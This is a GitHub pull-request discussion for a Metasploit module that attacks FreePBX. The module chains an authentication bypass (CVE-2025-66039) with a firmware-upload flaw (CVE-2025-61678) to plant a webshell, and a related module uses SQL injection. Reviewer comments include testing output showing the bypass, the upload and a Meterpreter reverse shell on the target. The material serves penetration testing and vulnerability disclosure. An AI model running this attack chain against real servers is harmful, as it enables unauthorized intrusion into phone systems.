Adds exploit module for FreePBX (CVE-2025-66039, CVE-2025-61678) #20858
Conversation
jheysel-r7
left a comment
jheysel-r7
left a comment
There was a problem hiding this comment.
Nice @msutovsky-r7! A couple minor comments. Testing was as expected 👍
Testing
msf exploit(unix/http/freepbx_firmware_file_upload) > set lhost utun5
lhost => utun5
msf exploit(unix/http/freepbx_firmware_file_upload) > set rhosts 10.5.134.168
rhosts => 10.5.134.168
msf exploit(unix/http/freepbx_firmware_file_upload) > set username admin
username => admin
msf exploit(unix/http/freepbx_firmware_file_upload) > run
[*] Started reverse TCP handler on 192.168.3.8:4444
[*] Trying to bypass authentication
[+] Bypass successful, trying upload webshell
[+] Upload successful, triggering..
[*] Sending stage (41503 bytes) to 10.5.134.168
[+] Deleted ../d4kq7oer
[*] Meterpreter session 1 opened (192.168.3.8:4444 -> 10.5.134.168:38918) at 2026-01-27 11:54:25 -0700
meterpreter > getuid
sysServer username: asterisk
infmeterpreter > sysinfo
Computer : freepbx.sangoma.local
OS : Linux freepbx.sangoma.local 3.10.0-1127.19.1.el7.x86_64 #1 SMP Tue Aug 25 17:23:54 UTC 2020 x86_64
Architecture : x64
System Language : C
Meterpreter : php/linux
meterpreter >
|
|
||
| if (res&.code == 401 && res.body.include?('FreePBX')) || | ||
| (res.code == 500) | ||
| return CheckCode::Detected('The FreePBX with authentication bypass detected') |
There was a problem hiding this comment.
Should this say the following?
| return CheckCode::Detected('The FreePBX with authentication bypass detected') | |
| return CheckCode::Detected('FreePBX with Webserver authorization mode detected') |
Or does the http request sent above confirm that the auth bypass is exploitable? I'm basing this question off the messaging in the CheckCode::Safe statement below
|
|
||
| FreePBX is an open-source IP PBX management tool that provides a modern phone system for businesses | ||
| that use VoIP to make and receive phone calls. Versions 16.0.44 and 17.0.23 are vulnerable to | ||
| multiple CVEs, specifically CVE-2025-66039 and CVE-2025-61678, in the context of this module. The |
There was a problem hiding this comment.
Same comment - can we notify the user of the different version ranges for CVE-2026-61678 here and in the metadata?
versions prior to 16.0.92 for FreePBX 16 and versions prior to 17.0.6 for FreePBX 17
| [+] Upload successful, triggering.. | ||
| [*] Sending stage (41224 bytes) to 192.168.168.223 | ||
| [*] Meterpreter session 9 opened (192.168.168.128:4242 -> 192.168.168.223:47616) at 2026-01-06 12:55:19 +0100 | ||
| [!] This exploit may require manual cleanup of 'qin7.php' on the target |
There was a problem hiding this comment.
This appears to be output from from a module run where the registry_file_for_clean_up wasn't successful.
Clean up worked for me - could we edit this to reflect expected output where the file gets cleaned up successfully?
| print_status('Trying to bypass authentication') | ||
| get_session_cookie | ||
|
|
||
| print_good('Bypass successful, trying upload webshell') | ||
|
|
||
| upload_webshell | ||
|
|
||
| print_good('Upload successful, triggering..') |
There was a problem hiding this comment.
To keep the output consistent. Since all print statements are using present participles it would makes sense for all of them to use ... and I think it's most common in framework to use the triple dots, when using dots.
| print_status('Trying to bypass authentication') | |
| get_session_cookie | |
| print_good('Bypass successful, trying upload webshell') | |
| upload_webshell | |
| print_good('Upload successful, triggering..') | |
| print_status('Trying to bypass authentication...') | |
| get_session_cookie | |
| print_good('Bypass successful, trying upload webshell...') | |
| upload_webshell | |
| print_good('Upload successful, triggering...') |
github-project-automation
bot
moved this from Waiting on Contributor
to In Progress
in Metasploit Kanban
Release NotesThis adds exploit module for FreePBX which chains an authentication bypass, CVE-2025-66039, with an unrestricted file upload (via firmware upload), CVE-2025-61678 , which allows for a webshell to be uploaded to the webserver resulting in remote code execution |
jheysel-r7
added
the
rn-modules
4 participants
This PR adds modules for multiple CVEs (CVE-2025-61675, CVE-2025-61678, CVE-2025-66039). This PR works as placeholder for now as modules are not finished, but contain the basic exploitation logic. All modules use authentication bypass (CVE-2025-66039). The CVE-2025-61675 describes multiple SQL injections, but the SQLi modules uses only one variant (one for user insertion, the other one for RCE).WORK IN PROGRESS, TREAT AS SUCHThe CVE-2025-66039 represents an authentication bypass: when FreePBX uses Webserver Authorization Mode (an option the admin can enable), it allows an attacker to authenticate as any user.
The CVE-2025-61675 describes multiple SQL injections; the modules exploits the SQL injection in the custom extension component. The module chains these vulnerabilities into an unauthenticated SQL injection attack that creates a new fake user and effectively grants an attacker access to the administration.
The CVE-2025-61678 allows unrestricted file uploads via firmware upload, including path traversal. These vulnerabilities allow unauthenticated remote code execution by bypassing authentication and placing a webshell in the web server’s directory.
To setup the environment, perform minimal installation from here. Note that Authorization Type needs to be set to webserver: